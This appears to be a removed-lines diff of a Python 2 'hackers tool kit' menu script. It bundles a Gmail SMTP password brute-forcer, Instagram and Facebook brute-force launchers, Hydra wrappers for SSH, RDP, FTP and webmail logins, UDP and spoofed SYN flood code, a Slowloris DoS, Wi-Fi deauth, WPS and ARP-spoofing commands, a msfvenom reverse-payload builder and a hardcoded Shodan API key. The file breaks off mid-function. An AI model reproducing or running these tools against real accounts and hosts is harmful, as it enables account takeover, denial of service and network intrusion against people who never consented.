'\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and 